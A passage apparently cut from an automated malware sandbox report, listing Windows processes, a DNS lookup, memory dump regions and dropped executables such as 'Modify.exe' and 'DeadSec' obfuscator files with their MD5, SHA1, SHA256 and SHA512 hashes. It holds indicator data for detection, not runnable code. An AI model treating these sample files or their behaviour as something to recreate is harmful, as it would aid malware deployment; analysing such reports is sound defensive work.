C:\Windows\System32\dllhost.exe /Processid:{a2452c33-c5ab-4e6d-809b-15f4873b33e7}

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 gstatic.com udp

Files

memory/2972-0-0x000007FEF5803000-0x000007FEF5804000-memory.dmp

memory/2972-1-0x0000000000E30000-0x0000000000E7A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe

MD5 737b2d60dc5d475685b65f5c288e00c0
SHA1 144ba7647d8609abe4aab74d4f191e2c594dd55a
SHA256 69c3458a319518d10939633f7421eb833c8c9c904f989f0ef75a572a59a1f084
SHA512 96a22774e1b5c22d9d4114a8f22f1f75cf2edc5970442e1b1e5eabfc70a922d3f4a5e5d8c93150f50ef3da45b241745f861f1d00b306c11707097495b84ecee6

memory/2060-15-0x00000000013D0000-0x00000000013E0000-memory.dmp

memory/2068-14-0x0000000000E00000-0x0000000000E40000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Modify.exe

MD5 9259d8aef8f52e8ff4fa082c0074c9b0
SHA1 88abb68a5632812be3c18e0c740e3818d9501b3e
SHA256 45d4033eeaa6aa420a644c3eb2d0ef659320c9a13e22d1d16930c807847203db
SHA512 9cb06d4026a53208e80865cdb21d79e40d418518a168680537cafa08f1c295094238014ba35c2b7794a773ac2dc480b01cf5811d5b1e60bf911d7a6d03985ede

memory/2716-20-0x000000001B7B0000-0x000000001BA92000-memory.dmp

memory/2972-22-0x000007FEF5800000-0x000007FEF61EC000-memory.dmp

memory/2716-21-0x0000000002690000-0x0000000002698000-memory.dmp

memory/2060-23-0x000007FEF5800000-0x000007FEF61EC000-memory.dmp

C:\ProgramData\www.DeadSec0000000000-obfusecator.exe

MD5 22d120454dd38d7f1a3f1cd0eb497f95
SHA1 4c11a082bf8e64b21310b959821a9f7324aa8107
SHA256 6fda5bd63e6647c70c7f420b4145898cada9e1a8bff4fca7f6a5859b648d217c
SHA512 1552101b7a22082eb69fe3485c53f595055bfc6db01ed14d4abc6f9cb9793e8ca3bc2f2448741fd8b4616f735c9f4f2e0299dc938d264103107fccbe68dc39a9

memory/2972-30-0x000007FEF5800000-0x000007FEF61EC000-memory.dmp

memory/3056-31-0x000000001A0B0000-0x000000001A392000-memory.dmp

memory/3056-32-0x0000000000970000-0x0000000000978000-memory.dmp

memory/3056-33-0x00000000012F0000-0x000000000131A000-memory.dmp

memory/3056-34-0x0000000077490000-0x0000000077639000-memory.dmp

memory/3056-35-0x0000000077270000-0x000000007738F000-memory.dmp

memory/2148-36-0x0000000140000000-0x0000000140008000-memory.dmp

memory/2148-38-0x0000000140000000-0x0000000140008000-memory.dmp

memory/2148-39-0x0000000140000000-0x0000000140008000-memory.dmp

memory/2148-37-0x0000000140000000-0x0000000140008000-memory.dmp

memory/2148-44-0x0000000140000000-0x0000000140008000-memory.dmp

memory/2148-43-0x0000000077270000-0x000000007738F000-memory.dmp

memory/2148-42-0x0000000077490000-0x0000000077639000-memory.dmp

memory/2148-41-0x0000000140000000-0x0000000140008000-memory.dmp

memory/488-87-0x00000000374D0000-0x00000000374E0000-memory.dmp

memory/488-86-0x000007FEBE4B0000-0x000007FEBE4C0000-memory.dmp

memory/488-85-0x0000000000A30000-0x0000000000A5C000-memory.dmp

memory/488-79-0x0000000000A30000-0x0000000000A5C000-memory.dmp

memory/472-73-0x00000000374D0000-0x00000000374E0000-memory.dmp

memory/472-72-0x000007FEBE4B0000-0x000007FEBE4C0000-memory.dmp

memory/472-71-0x00000000000E0000-0x000000000010C000-memory.dmp

memory/472-65-0x00000000000E0000-0x000000000010C000-memory.dmp

memory/428-59-0x00000000374D0000-0x00000000374E0000-memory.dmp

memory/428-58-0x000007FEBE4B0000-0x000007FEBE4C0000-memory.dmp

memory/428-57-0x0000000000C50000-0x0000000000C7C000-memory.dmp

memory/428-51-0x0000000000C50000-0x0000000000C7C000-memory.dmp

memory/428-50-0x0000000000C50000-0x0000000000C7C000-memory.dmp

memory/428-49-0x0000000000B00000-0x0000000000B26000-memory.dmp

memory/428-47-0x0000000000B00000-0x0000000000B26000-memory.dmp

memory/496-96-0x00000000002D0000-0x00000000002FC000-memory.dmp

memory/2060-221-0x000007FEF5800000-0x000007FEF61EC000-memory.dmp